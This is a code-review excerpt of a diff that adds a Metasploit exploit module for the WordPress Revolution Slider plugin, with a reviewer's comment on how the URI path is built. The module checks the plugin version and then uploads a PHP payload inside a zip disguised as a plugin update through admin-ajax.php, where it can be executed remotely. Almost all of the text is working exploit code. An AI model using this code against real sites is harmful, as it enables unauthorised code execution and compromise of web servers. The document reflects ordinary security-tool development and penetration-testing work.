modules/exploits/unix/webapp/wp_revslider_upload_execute.rb

```diff
@@ -0,0 +1,126 @@
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
+          ['URL', 'https://www.exploit-db.com/exploits/35385/'],
+          ['EDB', '35385'],
+          ['OSVDB', '115118']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
+      'DisclosureDate' => 'Nov 26 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    fixed_version = '3.0.96'
+
+    # RevSlider doesn't have a readme.txt, look elsewhere
+    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
+    vprint_status("#{peer} - Checking #{release_log_url}")
+    res = send_request_cgi(
+      'uri'    => release_log_url,
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      # No release_log.txt present for plugin
+      return Msf::Exploit::CheckCode::Unknown
+    end
+
+    if res.body
+      body = res.body.to_s
+      version = body[/(?:version)\s*([0-9a-z.-]+)/i, 1]
+    end
+
+    # Could not identify version number
+    return Msf::Exploit::CheckCode::Detected if version.nil?
+
+    vprint_status("#{peer} - Found version #{version}")
+
+    # Check to see if version older than fixed version
+    if Gem::Version.new(version) < Gem::Version.new(fixed_version)
+      return Msf::Exploit::CheckCode::Appears
+    else
+      return Msf::Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
+
+    # Build the zip
+    payload_zip = Rex::Zip::Archive.new
+    # If the filename in the zip is revslider.php it will be automatically
+    # executed but it will break the plugin and sometimes WordPress
+    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)
+
+    # Build the POST body
+    data = Rex::MIME::Message.new
+    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
+    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
+    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
+    post_data = data.to_s
+
+    res = send_request_cgi(
+      'uri'     => wordpress_url_admin_ajax,
+      'method'  => 'POST',
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => post_data
+    )
+
+    if res
+      if res.code == 200 && res.body =~ /Update in progress/
+        # The payload itself almost never deleted, try anyway
+        register_files_for_cleanup(php_pagename)
+        # This normally works
+        register_files_for_cleanup('../revslider.zip')
+        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', '/temp/update_extract/revslider/' + php_pagename)
```

Comment:
normally we do
`final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)`